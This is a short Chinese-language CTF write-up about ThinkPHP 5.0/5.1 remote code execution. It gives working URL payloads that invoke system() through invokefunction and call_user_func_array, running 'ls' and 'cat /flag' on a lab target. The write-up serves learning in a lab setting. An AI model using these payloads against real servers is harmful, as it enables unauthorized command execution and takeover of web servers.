打开靶机:
这道题没有什么难点,重点在于RCE的认识和thinkphp的漏洞。
那RCE是什么嘞:
RCE:远程代码执行漏洞
远程命令/代码执行漏洞,简称RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。RCE分为远程命令执行ping和远程代码执行evel。
漏洞产生的根本原因
服务器没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。
也就是说,如果thinkphp真的存在rce,我们就能通过各种指令来获取他的一些信息,包括flag的获取。
而thinkphp通过百度可知,他确实存在远程代码执行漏洞:
ThinkPHP 5.0<5.0.23&5.1<5.1.31版本在没有开启强制路由的情况下可能存在远程代码执行漏洞。攻击者通过该漏洞可能完全控制Web服务器。
解法:网页只显示了tinkphp,我们已知thinkphp是存在漏洞的,直接Github搜索thinkphp漏洞(https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection),发现:
在url后面的:
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=xxxxx(命令)
就是远程代码执行漏洞啦,输入命令就返回什么 。
输入ls命令查看全部:
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
所以构建payload:
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
cat命令是查看,我们直接查看flag就能看到flag: